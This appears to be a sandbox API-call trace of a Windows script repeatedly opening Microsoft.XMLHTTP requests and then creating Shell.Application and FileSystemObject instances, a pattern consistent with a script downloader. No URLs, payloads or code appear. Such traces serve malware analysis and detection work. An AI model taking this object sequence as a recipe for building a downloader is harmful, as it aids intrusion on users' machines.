	[0369.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0369.297] longjmp () 
	[0369.297] longjmp () 
	[0369.298] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0369.298] SysStringLen (param_1=0x0) returned 0x0
	[0369.298] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0369.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0369.298] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0369.298] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0369.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0369.298] ??2@YAPEAX_K@Z () returned 0x62f330
	[0369.298] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0369.298] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0369.298] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0369.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0369.298] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0369.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0369.298] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0369.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0369.298] longjmp () 
	[0369.299] longjmp () 
	[0369.299] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0369.299] SysStringLen (param_1=0x0) returned 0x0
	[0369.299] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0369.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0369.299] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0369.299] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0369.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0369.299] ??2@YAPEAX_K@Z () returned 0x62f310
	[0369.299] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0369.299] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0369.299] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0369.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0369.299] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0369.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0369.299] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0369.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0369.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0369.300] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0369.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0369.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0369.833] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0369.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0369.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0369.833] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0369.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0369.833] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0369.833] SysStringLen (param_1=0x0) returned 0x0
	[0369.833] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0369.834] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0369.834] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0369.834] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0369.834] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0369.834] ??2@YAPEAX_K@Z () returned 0x62f350
	[0369.834] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0369.834] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0369.834] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0369.834] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0369.834] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0369.834] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0369.834] SysStringLen (param_1=0x0) returned 0x0
	[0369.834] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0369.837] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0369.837] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0369.837] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0369.837] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0369.837] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0369.837] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0370.450] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0370.450] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0370.450] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0370.452] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0370.452] SysStringLen (param_1=0x0) returned 0x0
	[0370.452] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0370.452] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0370.452] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0370.452] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0370.452] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c77c8) returned 0x0
	[0370.452] ??2@YAPEAX_K@Z () returned 0x62f310
	[0370.452] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c77c8, pUnkSite=0x62f310) 
	[0370.452] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0370.452] XMLHTTPRequest:IUnknown:Release (This=0x49c77c8) returned 0x0
	[0370.452] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0370.452] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0370.452] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0370.452] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0370.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0370.455] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0370.455] SysStringLen (param_1=0x0) returned 0x0
	[0370.455] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0370.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0370.455] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0370.455] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0370.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0370.455] ??2@YAPEAX_K@Z () returned 0x62f330
	[0370.455] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f330) 
	[0370.456] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0370.456] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0370.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0370.456] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0370.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0370.456] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
